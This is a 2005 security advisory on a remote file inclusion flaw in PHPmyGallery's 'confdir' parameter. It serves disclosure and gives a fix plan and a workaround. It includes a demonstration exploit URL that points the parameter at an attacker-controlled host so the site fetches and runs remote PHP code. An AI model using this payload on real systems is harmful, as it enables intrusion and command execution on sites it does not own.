PHPmyGallery Include File Bug Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1014594
|
|
SecurityTracker URL: http://securitytracker.com/id?1014594
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 28 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): prior to 1.5 beta 2
|
Description: Securitysos Inc. reported a vulnerability in PHPmyGallery. A remote user can execute arbitrary commands on the target system.
The '/_conf/core/common-tpl-vars.php' script does not properly validate user-supplied input in the 'confdir' parameter. A remote
user can supply a specially crafted parameter value to cause the target system to include and execute arbitrary PHP code from a
remote location. The PHP code and any included operating system commands will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/[patch-to-phpmygallery]/_conf/core/common-tpl-vars.php?confdir=http://[attacker]
Other
scripts in the same directory may be affected.
The original advisory is available at:
http://securitysos.info/advisories/1.txt
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
Solution: The vendor plans to issue a fix as part of 1.5 beta 2.
A workaround is described at:
http://phpmygallery.kapierich.net/en/news/?file=2005-07-15
|
Vendor URL: phpmygallery.kapierich.net/ (Links to External Site)
|
Cause: Input validation error, State error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "securitysos" <team@securitysos.info>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 28 Jul 2005 19:45:13 -0000
From: "securitysos" <team@securitysos.info>
Subject: http://securitysos.info/advisories/1.txt
|
>phpmygallery photo album Remote File Include vulnerability
>
>A remote user can cause the target system to include and execute arbitrary PHP code
>
>http://securitysos.info/advisories/1.txt
>
>2005/07/28 securitysos Inc.
|
|